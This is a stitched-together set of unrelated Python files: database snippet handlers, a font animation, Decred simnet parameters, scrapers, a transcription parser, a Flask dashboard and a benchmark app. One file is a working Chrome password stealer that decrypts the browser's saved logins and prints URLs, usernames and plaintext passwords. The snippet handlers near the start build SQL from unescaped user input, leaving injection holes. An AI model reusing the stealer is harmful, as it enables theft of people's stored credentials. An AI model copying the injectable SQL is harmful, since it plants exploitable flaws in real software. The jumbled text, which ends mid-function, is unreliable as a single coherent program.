if v_mode == 'node':
v_session.v_omnidb_database.v_connection.Execute('''
delete
from snippets_nodes
where sn_id = {0}
'''.format(v_id))
else:
v_session.v_omnidb_database.v_connection.Execute('''
delete
from snippets_texts
where st_id = {0}
'''.format(v_id))
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
v_return['v_data'] = ''
return JsonResponse(v_return)
def save_snippet_text(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_id = json_object['p_id']
v_name = json_object['p_name']
v_text = json_object['p_text']
try:
#new snippet
if not v_id:
v_session.v_omnidb_database.v_connection.Execute('''
insert into snippets_texts values (
(select coalesce(max(st_id), 0) + 1 from snippets_texts),'{0}','{1}','','',null,{2})
'''.format(v_name,v_text.replace("'", "''"),v_session.v_user_id))
#existing snippet
else:
v_session.v_omnidb_database.v_connection.Execute('''
update snippets_texts
set st_text = '{0}'
where st_id = {1}
'''.format(v_text.replace("'", "''"),v_id))
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
v_return['v_data'] = ''
return JsonResponse(v_return)
def rename_node_snippet(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_id = json_object['p_id']
v_name = json_object['p_name']
v_mode = json_object['p_mode']
try:
#node
if v_mode=='node':
v_session.v_omnidb_database.v_connection.Execute('''
update snippets_nodes
set sn_name = '{0}'
where sn_id = {1}
'''.format(v_name,v_id))
#snippet
else:
v_session.v_omnidb_database.v_connection.Execute('''
update snippets_texts
set st_name = '{0}'
where st_id = {1}
'''.format(v_name,v_id))
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
v_return['v_data'] = ''
return JsonResponse(v_return)
|
from coldtype import *
from defcon import Font
curves = Font(__sibling__("media/digestivecurves.ufo"))
df = "~/Type/fonts/fonts/_wdths/DigestiveVariable.ttf"
def ds(e1, e2):
# 128, -50 on size
return StyledString("Digestive", Style(df, 186-0*e2, fill=1, tu=0+0*e1, wdth=e1, ro=1, bs=0*(1-e2))).pens()
def render_snake(f, fi):
a:Animation = f.a
at1 = a.progress(fi, loops=10, easefn="ceio")
at2 = a.progress(fi, loops=10, easefn="ceio")
track = DATPen()
curves["path1"].draw(track)
track.scaleToRect(f.a.r).align(f.a.r, th=1, tv=1).translate(0, -20).f(None).s(1).sw(1).scale(1.15)
t = track.copy()
track.repeat(3)#.scale(1.15)
dps:DATPenSet = ds(at1.e, at2.e)
minw = ds(0, 0).getFrame(th=1).point("SE").x
maxw = ds(1, 1).getFrame(th=1).point("SE").x
if at1.loop_phase == 1:
offset = maxw-dps.getFrame(th=1).point("SE").x
else:
offset = 0
offset += math.floor(at1.loop/2)*(maxw-minw)
dps.distributeOnPath(track, offset=offset).reversePens()
return t, dps
t = Timeline(350, storyboard=[0, 20, 349])
@animation(rect=(1920,500), timeline=t)
def render(f):
test = False
if test:
_, zero = render_snake(f, 0)
track, now = render_snake(f, f.i)
bg = hsl(0, l=0.97)
return DATPenSet([
DATPen().rect(f.a.r).f(bg),
DATPenSet([
zero.f(hsl(0.1, l=0.8)) if test else DATPen(),
track.f(None).s(hsl(0.65, l=0.9)).sw(15).translate(0, -8),
now.f(hsl(0.9, l=0.6, s=0.7))#.understroke(s=bg, sw=5),
#track.copy().translate(0, 180),
]).translate(0, -30)
])
|
"""
Copyright (c) 2019, Brian Stafford
Copyright (c) 2019, The Decred developers
See LICENSE for details
simnet holds simnet parameters. Any values should mirror exactly
https://github.com/decred/dcrd/blob/master/chaincfg/simnetparams.go
"""
# SimNetParams defines the network parameters for the simulation test network.
# This network is similar to the normal test network except it is intended for
# private use within a group of individuals doing simulation testing and full
# integration tests between different applications such as wallets, voting
# service providers, mining pools, block explorers, and other services that
# build on Decred.
#
# The functionality is intended to differ in that the only nodes which are
# specifically specified are used to create the network rather than following
# normal discovery rules. This is important as otherwise it would just turn
# into another public testnet.
Name = "simnet"
DefaultPort = "18555"
DNSSeeds = None # NOTE: There must NOT be any seeds.
# Chain parameters
GenesisHash = "5bec7567af40504e0994db3b573c186fffcc4edefe096ff2e58d00523bd7e8a6"
PowLimit = 2 ** 255 - 1
PowLimitBits = 0x207FFFFF
ReduceMinDifficulty = False
MinDiffReductionTime = 0 # Does not apply since ReduceMinDifficulty fals
GenerateSupported = False
MaximumBlockSizes = [1310720]
MaxTxSize = 1000000
TargetTimePerBlock = 1 # one secon
WorkDiffAlpha = 1
WorkDiffWindowSize = 8
WorkDiffWindows = 4
TargetTimespan = 8 # TimePerBlock * WindowSize
RetargetAdjustmentFactor = 4
# Subsidy parameters.
BaseSubsidy = 50000000000
MulSubsidy = 100
DivSubsidy = 101
SubsidyReductionInterval = 128
WorkRewardProportion = 6
StakeRewardProportion = 3
BlockTaxProportion = 1
# Checkpoints ordered from oldest to newest.
Checkpoints = (None,)
# Consensus rule change deployments.
#
# The miner confirmation window is defined as:
# target proof of work timespan / target proof of work spacing
# 10% of RuleChangeActivationInterval * TicketsPerBlock
RuleChangeActivationQuorum = 160
RuleChangeActivationMultiplier = 3 # 75%
RuleChangeActivationDivisor = 4
RuleChangeActivationInterval = 320 # 320 seconds
# Enforce current block version once majority of the network has upgraded.
# 51% (51 / 100)
# Reject previous block versions once a majority of the network has upgraded.
# 75% (75 / 100)
BlockEnforceNumRequired = 51
BlockRejectNumRequired = 75
BlockUpgradeNumToCheck = 100
# AcceptNonStdTxs is a mempool param to either accept and relay
# non standard txs to the network or reject them
AcceptNonStdTxs = True
# Address encoding magics
NetworkAddressPrefix = ("S",)
PubKeyAddrID = (0x276F).to_bytes(2, byteorder="big") # starts with Sk
PubKeyHashAddrID = (0x0E91).to_bytes(2, byteorder="big") # starts with Ss
PKHEdwardsAddrID = (0x0E71).to_bytes(2, byteorder="big") # starts with Se
PKHSchnorrAddrID = (0x0E53).to_bytes(2, byteorder="big") # starts with SS
ScriptHashAddrID = (0x0E6C).to_bytes(2, byteorder="big") # starts with Sc
PrivateKeyID = (0x2307).to_bytes(2, byteorder="big") # starts with Ps
# BIP32 hierarchical deterministic extended key magics
HDPrivateKeyID = (0x0420B903).to_bytes(4, byteorder="big") # starts with sprv
HDPublicKeyID = (0x0420BD3D).to_bytes(4, byteorder="big") # starts with spub
# BIP44 coin type used in the hierarchical deterministic path for
# address generation.
SLIP0044CoinType = 1 # SLIP0044, Testnet (all coins)
LegacyCoinType = 115 # ASCII for s, for backwards compatibility
# Decred PoS parameters
MinimumStakeDiff = 20000
TicketPoolSize = 64
TicketsPerBlock = 5
TicketMaturity = 16
TicketExpiry = 384 # 6*TicketPoolSize
CoinbaseMaturity = 16
SStxChangeMaturity = 1
TicketPoolSizeWeight = 4
StakeDiffAlpha = 1
StakeDiffWindowSize = 8
StakeDiffWindows = 8
StakeVersionInterval = 8 * 2 * 7
MaxFreshStakePerBlock = 20 # 4*TicketsPerBlock
StakeEnabledHeight = 16 + 16 # CoinbaseMaturity + TicketMaturity
StakeValidationHeight = 16 + (64 * 2) # CoinbaseMaturity + TicketPoolSize*2
StakeBaseSigScript = (0xDEADBEEF).to_bytes(4, byteorder="big")
StakeMajorityMultiplier = 3
StakeMajorityDivisor = 4
# Decred organization related parameters
#
# Treasury address is a 3-of-3 P2SH going to a wallet with seed:
# aardvark adroitness aardvark adroitness
# aardvark adroitness aardvark adroitness
# aardvark adroitness aardvark adroitness
# aardvark adroitness aardvark adroitness
# aardvark adroitness aardvark adroitness
# aardvark adroitness aardvark adroitness
# aardvark adroitness aardvark adroitness
# aardvark adroitness aardvark adroitness
# briefcase
# (seed 0x0000000000000000000000000000000000000000000000000000000000000000)
#
# This same wallet owns the three ledger outputs for simnet.
#
# P2SH details for simnet treasury:
#
# redeemScript: 532103e8c60c7336744c8dcc7b85c27789950fc52aa4e48f895ebbfb
# ac383ab893fc4c2103ff9afc246e0921e37d12e17d8296ca06a8f92a07fbe7857ed1d4
# f0f5d94e988f21033ed09c7fa8b83ed53e6f2c57c5fa99ed2230c0d38edf53c0340d0f
# c2e79c725a53ae
# (3-of-3 multisig)
# Pubkeys used:
# SkQmxbeuEFDByPoTj41TtXat8tWySVuYUQpd4fuNNyUx51tF1csSs
# SkQn8ervNvAUEX5Ua3Lwjc6BAuTXRznDoDzsyxgjYqX58znY7w9e4
# SkQkfkHZeBbMW8129tZ3KspEh1XBFC1btbkgzs6cjSyPbrgxzsKqk
#
# Organization address is ScuQxvveKGfpG1ypt6u27F99Anf7EW3cqhq
OrganizationPkScript = (0xA914CBB08D6CA783B533B2C7D24A51FBCA92D937BF9987).to_bytes(
23, byteorder="big"
)
OrganizationPkScriptVersion = 0
# BlockOneLedger = BlockOneLedgerSimNet,
BlockOneSubsidy = int(300000 * 1e8)
|
from oslo_utils import importutils
profiler_opts = importutils.try_import('osprofiler.opts')
def register_opts(conf):
if profiler_opts:
profiler_opts.set_defaults(conf)
def list_opts():
return {
profiler_opts._profiler_opt_group: profiler_opts._PROFILER_OPTS
}
|
if __name__ =='__main__':
n = int(input("Enter number of scores"))
arr =list(set(map(int,input("Enter space separated list of scores").split())))
print(sorted(arr,reverse=True)[1])
|
# Copyright (c) 2021-2022 Kabylkas Labs.
# Licensed under the Apache License, Version 2.0.
# Python packages.
import requests
from bs4 import BeautifulSoup
# Local packages.
import stockmarketapi.constants as constants
# Helper functions.
def GetContent(url):
req = requests.get(url, headers = constants.kHtmlHeader)
soup = BeautifulSoup(req.content, 'html.parser')
return soup
# Implementation methods of the API.
def GetCurrentPrice(ticker):
url = constants.kFinvizQuoteUrl.format(ticker)
soup = GetContent(url)
all_content = soup.find("div", { "data-testid": "quote-data-content" })
table_content = all_content.find_all("td")
found_price = False
price_element = ""
for data in table_content:
if found_price:
price_element = "{}".format(data)
break
if "Price" in data:
found_price = True
parse_stage_1 = price_element.split("<b>")
parse_stage_2 = parse_stage_1[1].split("</b>")
price = parse_stage_2[0]
return float(price)
def GetROIC(ticker):
url = constants.kGuruFocusRoicUrl.format(ticker)
soup = GetContent(url)
roic_div = soup.find("div", { "id": "target_def_description" })
strongs = roic_div.find_all("strong")
strong = "{}".format(strongs[3])
parse_stage_1 = strong.split("<strong>")
parse_stage_2 = parse_stage_1[1].split("%")
roic = parse_stage_2[0]
return float(roic)
def LoadMarket():
print("Loading market...")
market_tickers = []
url = constants.kFinvizEmptyScreenerUrl
next_found = True
pages_parsed = 0
while next_found:
print("Parsing {}".format(url))
soup = GetContent(url)
# Get the anchor that links to the next page.
all_links = soup.find_all("a", { "class" : "tab-link"})
next_found = False
for link in all_links:
string_link = "{}".format(link)
if "next" in string_link:
next_found = True
s = string_link.split("\"")
save_link = s[3]
save_link = save_link.replace("&", "&")
if next_found:
url = "https://finviz.com/{}".format(save_link)
# Get the tickers.
screener_content_div = soup.find("div", { "id" : "screener-content"} )
ticker_links = screener_content_div.find_all("a", { "class" : "screener-link-primary"})
for link in ticker_links:
string_link = "{}".format(link)
s_0 = string_link.split("?t=")
s_1 = s_0[1].split("&")[0]
market_tickers.append(s_1)
# Increment the count.
pages_parsed += 1
print("Pages parsed: {}".format(pages_parsed + 1))
print(market_tickers)
return market_tickers
|
import collections
Node = collections.namedtuple('Node', 'val left right')
# some sample trees having various node counts
tree0 = None # empty tree
tree1 = Node(5, None, None)
tree2 = Node(7, tree1, None)
tree3 = Node(7, tree1, Node(9, None, None))
tree4 = Node(2, None, tree3)
tree5 = Node(2, Node(1, None, None), tree3)
tree6 = Node(2, Node(1, Node(1, tree5, Node(2, None, tree3)), tree4), Node(2, None, tree3))
tree7 = Node(2, Node(1, Node(1, tree5, Node(2, tree6, tree3)), tree4), Node(2, tree6, tree3))
def flatten(bst):
# empty case
if bst is None:
return []
# node case
return flatten(bst.left) + [bst.val] + flatten(bst.right)
def flatten_iter(bst):
left = []
parents = []
def descend_left(bst):
while bst is not None:
parents.append(bst)
bst = bst.left
descend_left(bst)
while parents:
bst = parents.pop()
left.append(bst.val)
descend_left(bst.right)
return left
# tests
def check_flattener(f):
assert f(tree0) == []
assert f(tree1) == [5]
assert f(tree2) == [5, 7]
assert f(tree3) == [5, 7, 9]
assert f(tree4) == [2, 5, 7, 9]
assert f(tree5) == [1, 2, 5, 7, 9]
print('ok')
# check_flattener(flatten)
# time measurement
import timeit
def recursive():
flatten(tree7)
def iteretive():
flatten_iter(tree7)
list(print(func.__name__, timeit.timeit(func, number=1_000_000)) for func in [recursive, iteretive])
|
# ===--- gyb_stdlib_unittest_support.py --------------*- coding: utf-8 -*-===//
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2016 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
TRACE = '''
_ message: @autoclosure () -> String = "",
stackTrace: SourceLocStack = SourceLocStack(),
showFrame: Bool = true,
file: String = #file, line: UInt = #line'''
stackTrace = 'stackTrace.pushIf(showFrame, file: file, line: line)'
trace = 'message(),\n stackTrace: ' + stackTrace
|
from .analyzer import Analyzer
from .formatter import Formatter
from . import yacc
import io
import sys
import traceback
from . import yacc
def translate(qasm) :
strfile = io.StringIO()
formatter = Formatter(file=strfile)
# formatter.set_funcname(factory_name)
analyzer = Analyzer(formatter)
yacc.parse(qasm, analyzer)
code = strfile.getvalue()
strfile.close()
return code
def translate_file(filename) :
with open(filename, 'r') as file :
qasm = file.read()
return translate(qasm)
class QasmModule :
pass
def load_circuit(qasm) :
code = translate(qasm)
module = QasmModule()
errmsg = None
try :
exec(code, module.__dict__)
except Exception as e:
detail = e.args[0]
cl, exc, tb = sys.exc_info()
lineno = traceback.extract_tb(tb)[-1][1]
lines = code.splitlines()
errmsg = '{}, \'{}\''.format(detail, lines[lineno - 1])
ex_factory = e.__class__
finally :
if errmsg is not None :
raise ex_factory(errmsg)
return module
def load_circuit_from_file(filename) :
with open(filename, 'r') as file :
qasm = file.read()
return load_circuit(qasm)
|
#!/usr/bin/env python3
import json
from collections import OrderedDict
###################################################################################################
# A set of container classes for Scarlets and Blues data
# The classificationObject is the basic type which comprises an Ordered Dictionary and a key index
# to lookup entries by the order the were entered.
# The class also includes methods to add new items and retrieve by key or index position
#
# classificationRow, classificationRecord and classificationRecordSet are all types of classificationObject
#
# A Row represents an entry in the export csv where the data is loaded from
# A Record consists of a set of values entered by a transcriber in response to task questions
# e.g. T0='enter surname', T1='enter initials'
# In this case T0 and T1 are a series of tasks which group together to form one record
# The record may represent a row in a table, or an item within some meeting minutes
# A RecordSet is a collection of Record objects. This may represent all of the rows in a table,
# or all of the items on the meeting agenda.
#
# A taskActions object contains a set of tasks with actions assigned to each one.
# A transcription workflow (e.g. People) consists of a defined set of tasks. Some task ids (e.g. T0) will signify
# the beginning of a larger task, others signify the capture of data, and others the end of the main task.
# These roles are represented in a taskActions object as 'create', 'add' and 'close', respectively
# The classificationRecordset object uses actions to group together task answers into Records
#
###################################################################################################
import re
class Ditto:
def __init__(self):
self.value = '-do-'
def is_ditto(self, text):
assert not re.search(r'[-_]+d[do][-_]+d+[do][-_]+', text), "Double -do- style ditto"
assert not re.search(r'""', text), 'Double " style ditto' #Maybe should treat this as finger-stutter and collapse to one ditto
return re.fullmatch(r'(?:^|\s)("|[-_~]+d+[do][-_~]+)(?:\s|$)', text) is not None
def update(self, value):
self.value = value
def __str__(self):
return str(self.value)
def __repr__(self):
return str(self.value)
class classificationObject:
delimiter = chr(32) #This is space (i.e. ' ')
def __init__(self, parent = None, predecessor = None):
self.items = OrderedDict() # Maintains entry order when iterated over
self.key_index = [] # Despite maintaining order, OrderedDict does not have a method for looking up the ith item
#self.delimiter = chr(32) # Used by get_delimited method, this should be overridden by each subclass so each has a unique delimiter
self.parent = parent
self.predecessor = predecessor
self.has_dittos = False
def add(self, value, key = None): # Add a new entry to the object
if key is None:
key = len(self.items)
if isinstance(value, str):
if len(value) == 0:
value = chr(0) # This is needed for aligning empty strings/values
if key in self.items: #Sometimes we have multiple instances of the same key (e.g. repeatable fields)
key += f'_{len(self.items)}'
assert not key in self.items
self.items[key] = value
self.key_index.append(key)
def get_last_added(self):
if len(self.key_index) == 0:
return None
return self.get_by_index(len(self.key_index)-1)
def get_by_key(self, key): # Lookup a known key
return self.items[key]
def get_by_index(self, index): # Lookup the Nth item
if isinstance(index, list):
if len(index) == 1:
assert(index[0] != -1)
#if index[0] == -1:
# return ""
assert(index[0] >= 0 and index[0] < len(self.key_index)), f'{index[0]}, {len(self.key_index)}, {self.key_index}'
#if index[0] >= len(self.key_index):
# return self.items
return self.items[self.key_index[index[0]]]
else:
if isinstance(self.items[self.key_index[index[0]]], classificationObject):
return self.items[self.key_index[index[0]]].get_by_index(index[1:])
else:
print(self.items[self.key_index[index[0]]],"not CO")
else:
assert(index != -1)
assert(index >= 0 and index < len(self.key_index))
#if index == -1:
# return ""
#if index >= len(self.key_index):
# return self.items
return self.items[self.key_index[index]]
def __str__(self):
return str(self.items)
def __repr__(self):
return str(self)
def get_delimited(self): # Turn object into a delimited string; could potentially be called by the __str__ method
delim_entry = ""
for r in self.items.values():
delim_entry += self.delimiter
if r is None:
delim_entry += ""
elif isinstance(r, classificationObject): # This is why delimiters should be unique to subclass, so
# records, fields, words are delimited differently
delim_entry += r.get_delimited()
else:
delim_entry += str(r)
return delim_entry[1:] # first character will be a delimiter so remove it
# A classificationRow represents a row of the csv export from Zooniverse
class classificationRow(classificationObject):
# Fields expected in the Zooniverse export csv plus subject_name which is extracted from another field
#__field_lookup = {'classification_id':0, 'user_name':1, 'user_id':2, 'user_ip':3, 'workflow_id':4, 'workflow_name':5,
# 'workflow_version':6, 'created_at':7, 'gold_standard':8, 'expert':9, 'metadata':10, 'annotations':11,
# 'subject_data':12, 'subject_ids':13, 'subject_name':14}
__field_list = ['classification_id', 'user_name', 'user_id', 'user_ip', 'workflow_id', 'workflow_name',
'workflow_version', 'created_at', 'gold_standard', 'expert', 'metadata', 'annotations',
'subject_data', 'subject_ids', 'subject_name']
#def __init__(self):
# super().__init__()
def add_row(self, row): # Expecting an already split row in a list
for i,fld in enumerate(row):
try:
j_fld = json.loads(fld) # If the contents of the field are json this will be successful and j_fld will be a dictionary
except: # if they're just a string there will be an exception
j_fld = fld
self.add(j_fld, self.__field_list[i])
subject_id = self.get_by_key('subject_ids')
subject_data = self.get_by_key('subject_data')
# Ideally the subject_id would be used but this changes when images are reloaded
# so name is more consistent, although the case varies for how Name is named.
if 'name' in subject_data[str(subject_id)]:
subject = subject_data[str(subject_id)]['name']
if 'Name' in subject_data[str(subject_id)]:
subject = subject_data[str(subject_id)]['Name']
subject = subject.replace(" ","/")
self.add(subject, 'subject_name')
# A classificationRecordSet is expected to be multiple entries on a page
# For example a list of names in the People workflow
class classificationRecordSet(classificationObject):
delimiter = chr(30) #^^ in less
#def __init__(self, parent=None, predecessor=None):
# super().__init__(parent, predecessor)
# self.delimiter = chr(30) # This will be the delimiter between records with a RecordSet
def set_actions(self, actions): # Actions are used to group tasks to make a record (i.e. fields within a record - surname etc.)
self.actions = actions
def add_annotation(self, annotation):
R = None
# an annotation contains all of the tasks performed by a transcriber for a workflow on a subject (page of document)
# By following the task order for a specific group of tasks we can build a Record
# Each Record is then added to the RecordSet
ann_queue = [] # use a queue because of nested tasks in lists (see below)
record_id = 0
prev_record = None
for ann in annotation: # each annotation is a dictionary containing a task and a value
ann_queue.append(ann)
while len(ann_queue) > 0:
this_ann = ann_queue.pop(0)
#print(this_ann)
# some tasks consist of sub-tasks which are held in a list
# This will convert a list into multiple entries in the queue
if isinstance(this_ann['value'], list) and len(this_ann['value']) > 0:
if 'task' in this_ann['value'][0]:
for v in this_ann['value']:
assert 'task' in v, 'Broken assumption: value list can only be all tasks or all something else'
ann_queue.append(v)
else: #assume this is a multichoice -- which we happen to want to treat as multiple records of the given task type
for v in sorted(this_ann['value']): #We aren't bothered about the order (which might not match what is on the page anyway) and sorting these will make alignment easier
ann_queue.append({'task': f'{this_ann["task"]}_mc', 'value': v})
if this_ann['task'] in self.actions: # only interested in certain tasks
actions = self.actions[this_ann['task']]
#If the action is a callable then it is supposed to extend the queue
for callback in filter(lambda x: callable(x), actions):
ann_queue.extend(callback(this_ann))
if 'close' in actions or 'create' in actions:
if R is not None:
self.add(R) # Add current record to the recordset
#print("Record is:", R.get_field_tasks())
prev_record = self.get_last_added()
if 'create' in actions:
R = classificationRecord(self, prev_record) # Create a new record
if 'add' in actions:
if R is None:
R = classificationRecord(self, prev_record)
# There is a data error in the current version of the export which means that
# the first task of a group is not always coming through.
# Ideally this would be the 'create' task and would also provide a label
# for the type of record.
print("********** Warning: expected create action missing:",this_ann['task'])
#Hacky: treat dropdowns as strings, instead of reconciling on their own terms.
#TODO: Consider writing custom comparison code for dropdowns. If not, consider
# converting them into strings where we manipulate the task queue (higher
# in this same function), just to keep all of our manipulations together.
if 'task_type' in this_ann:
if this_ann['task_type'] == 'dropdown-simple':
if 'label' in this_ann['value']:
R.add(this_ann['value']['label'], this_ann['task'])
else:
R.add('', this_ann['task'])
else:
assert False, 'Surprising task type'
else:
R.add(this_ann['value'], this_ann['task']) # Add field value to the current record
if R.has_dittos:
self.has_dittos = True
# A classificationRecord object represents a single entry in a RecordSet (e.g. a row in a list of people)
# Each item added will represent a field in the Record
class classificationRecord(classificationObject):
delimiter = chr(31) #^_ in less
#def __init__(self, parent=None, predecessor=None):
# super().__init__(parent, predecessor)
# self.delimiter = chr(31)
def add(self, value, key=None):
predecessor = self.get_last_added()
field = classificationField(self, predecessor)
field.add(value)
if field.has_dittos:
self.has_dittos = True
super().add(field, key)
def get_field_tasks(self):
return [k for k in self.items.keys()]
class classificationField(classificationObject):
def add(self, value, key=None):
tokens = value.split(self.delimiter)
prev_token = None
for tk in tokens:
CW = classificationWord(tk, self, prev_token)
if CW.has_dittos:
self.has_dittos = True
super().add(CW)
if CW.has_dittos:
if self.parent is not None:
if self.parent.predecessor is not None:
parent_index = len(self.parent.items)
this_index = len(self.items)-1
#print("idx",parent_index,this_index,"parent",self.parent.get_delimited(),"pred",self.parent.predecessor.get_delimited())
predecessor_field = self.parent.predecessor.get_by_index(parent_index)
key = CW.key_index[0]
if isinstance(predecessor_field,classificationObject):
self.items = predecessor_field.items
self.key_index = predecessor_field.key_index
#print(self.get_delimited(),"updated", self.parent.get_delimited())
prev_token = CW
class classificationWord(classificationObject):
delimiter = chr(0) #^@ in less
ditto_test = Ditto()
def __init__(self, token=None, parent=None, predecessor=None):
super().__init__(parent, predecessor)
#self.delimiter = chr(0)
if token is not None:
self.add(token)
def add(self, value, key=None):
if self.ditto_test.is_ditto(value):
super().add(Ditto())
self.has_dittos = True
return
for c in value.split(self.delimiter):
super().add(c)
# If you were to implement objects down to Token level this is how it would work
# There are advantages to this for individual character comparisons
# However, before doing that the alignment code would need to change has it has
# character positions at the field level rather than word
#tokens = list(c)
#for t in tokens:
# CT = classificationToken()
# CT.add(t)
# super().add(CT)
class classificationToken(classificationObject):
delimiter = chr(0) #^@ in less
# taskActions are used to identify recordssets, records and fields through the tasks in a workflow
# Example code for loading is in the align_workflows.py file
# Usage to filter workflow is in the classificationRecordSet class above
class taskActions:
def __init__(self):
self.actions = {}
def add(self, action_name, workflows):
if isinstance(workflows, str): # Allows single item workflow to be passed as a string
workflows = [workflows]
for w in workflows:
if w not in self.actions:
self.actions[w] = []
self.actions[w].append(action_name)
if __name__ == "__main__":
D = Ditto()
print(D.is_ditto("vair"),"vair")
print(D.is_ditto('"'),'"')
print(D.is_ditto("~do~"),"~do~")
print(D.is_ditto("-ddd-"), "-ddd-")
print(D.is_ditto("-DDD-"), "-DDD-")
|
import base64
import win32crypt
from os import getenv
import sqlite3
import json
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from shutil import copyfile
def decrptPass():
Localstate = getenv("LocalAppData")+"\\Google\\Chrome\\User Data\\Local State"
with open(Localstate,"r") as f:
content = f.read()
key = json.loads(content)['os_crypt']['encrypted_key']
a = base64.b64decode(key)
originkey = win32crypt.CryptUnprotectData(a[5::], None, None, None, 0)[1]
copyfile(getenv("LocalAppData") + "\\Google\\Chrome\\User Data\\Default\\Login Data","tmp_Login_Data")
conn = sqlite3.connect("tmp_Login_Data")
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
iv = result[2][3:15]
enctext = result[2][15:]
aesgcm=AESGCM(originkey)
plaintext = aesgcm.decrypt(iv,enctext,None).decode('utf-8')
url = result[0]
username = result[1]
if not url and not username:
pass
else:
print(url+","+username+","+plaintext)
if __name__ == '__main__':
decrptPass()
|
import pandas as pd
import numpy as np
import plotly.express as px
import plotly
import json
import plotly.io as pio
from flask import Flask, render_template
pio.renderers.default = "browser"
app = Flask(__name__,template_folder='templates')
##### Importation des Donnรฉes #######
#use encoder to avoid utf-8 error
df = pd.read_csv('top10s.csv',encoding = "ISO-8859-1")
#supprimer id column
df = df.iloc[:,1:15]
df = df.loc[df['year']>=2015]
# on prends les donnรฉes de 5 annรฉes
print(df.head())
print('Data frame shape: {}'.format(df.shape))
##### Data preprocessing ########
famous_genres = df['top genre'].value_counts().head(5).to_frame().reset_index()
famous_genres.columns = ['genre','Count']
famous_genres_list = list(famous_genres['genre'])
top_5_genre = famous_genres_list
df_top = df.loc[df['top genre'].isin(top_5_genre)]
group_by_genre = df_top.groupby(["year","top genre"]).mean().sort_values('year').reset_index()
famous_artist = df['artist'].value_counts().head(5).to_frame().reset_index()
famous_artist.columns = ['artist','Count']
famous_artist_list = list(famous_artist['artist'])
top_5_artist = famous_artist_list
df_top_artist = df.loc[df['artist'].isin(top_5_artist)]
##### Visualisations ######
def create_fig1():
fig1= px.scatter(df, x='dnce', y='nrgy', color='nrgy', hover_name='title', hover_data=['artist', 'year'],title ='Distribution of energy and danceability')
return fig1
fig1=create_fig1()
def create_fig2():
fig2 = px.line(group_by_genre,
x='year',
y='pop',
line_group='top genre',
title='Top Genres Average Popularity',
template='plotly_white',
color='top genre')
return fig2
fig2=create_fig2()
def create_fig3():
# Visualize
fig3 = px.bar(famous_artist.sort_values('Count'),
x='Count',
y='artist',
title='Top 5 Artist',
template='plotly_white',
orientation='h')
return fig3
fig3=create_fig3()
def create_fig4():
fig4 = px.violin(df, y='dnce', color='year', points='all', hover_name='title', hover_data=['artist'] , title='Danceability of songs')
return fig4
fig4=create_fig4()
def create_fig5():
# Average Popularity of a particular genre over the years
fig5 = px.box(df_top_artist,
x='artist',
y='pop',
hover_name='title',
title='Artist Songs Popularity Distribution',
template='plotly_white',
points='all')
return fig5
fig5=create_fig5()
def create_fig6():
fig6= px.scatter(df_top,
x='pop',
y='bpm',
color='top genre',title='Distribution of popularity and BPM')
return fig6
fig6=create_fig6()
@app.route("/")
def index():
figures = []
figures.append(fig1)
figures.append(fig2)
figures.append(fig3)
figures.append(fig4)
figures.append(fig5)
figures.append(fig6)
ids = ['figure-{}'.format(i) for i, _ in enumerate(figures)]
figuresJSON = json.dumps(figures, cls=plotly.utils.PlotlyJSONEncoder)
return render_template('index.html',ids=ids,figuresJSON=figuresJSON)
if __name__ == "__main__":
print(df)
result = app.run(debug=True, port=5000)
print(result)
|
"""Holds ``DiagGGN{Exact, MC}`` extension for BackPACK's custom ``Slicing`` module."""
from backpack.core.derivatives.slicing import SlicingDerivatives
from backpack.extensions.secondorder.diag_ggn.diag_ggn_base import DiagGGNBaseModule
class DiagGGNSlicing(DiagGGNBaseModule):
"""``DiagGGN{Exact, MC}`` for ``backpack.custom_modules.slicing.Slicing``."""
def __init__(self):
"""Pass derivatives for ``backpack.custom_modules.pad.Pad`` module."""
super().__init__(SlicingDerivatives())
|
#!/usr/bin/env python
from collections import namedtuple
from operator import attrgetter
from random import randint
import sys
from flask import Flask, request, render_template, make_response, jsonify
from pony import orm
if sys.version_info[0] == 3:
xrange = range
_is_pypy = hasattr(sys, "pypy_version_info")
if _is_pypy:
from psycopg2cffi import compat
compat.register()
DBDRIVER = "postgres"
DBHOST = "tfb-database"
# setup
app = Flask(__name__)
# Start Contrast Specific Changes
from contrast.agent.middlewares.flask_middleware import FlaskMiddleware as ContrastMiddleware
app.wsgi_app = ContrastMiddleware(app)
# End Contrast Specific Changes
app.config[
"STORM_DATABASE_URI"
] = "{DBDRIVER}://benchmarkdbuser:benchmarkdbpass@{DBHOST}:5432/hello_world".format(
DBDRIVER=DBDRIVER, DBHOST=DBHOST
)
app.config["JSONIFY_PRETTYPRINT_REGULAR"] = False
db = orm.Database()
db.bind(
DBDRIVER,
host=DBHOST,
port=5432,
user="benchmarkdbuser",
password="benchmarkdbpass",
database="hello_world",
)
class World(db.Entity):
_table_ = "world"
id = orm.PrimaryKey(int)
randomNumber = orm.Required(int, column="randomnumber")
def to_dict(self):
"""Return object data in easily serializeable format"""
return {"id": self.id, "randomNumber": self.randomNumber}
class Fortune(db.Entity):
_table_ = "fortune"
id = orm.PrimaryKey(int, auto=True)
message = orm.Required(str)
db.generate_mapping(create_tables=False)
def get_num_queries():
try:
num_queries = request.args.get("queries", 1, type=int)
except ValueError:
num_queries = 1
if num_queries < 1:
return 1
if num_queries > 500:
return 500
return num_queries
def generate_ids(num_queries):
ids = {randint(1, 10000) for _ in xrange(num_queries)}
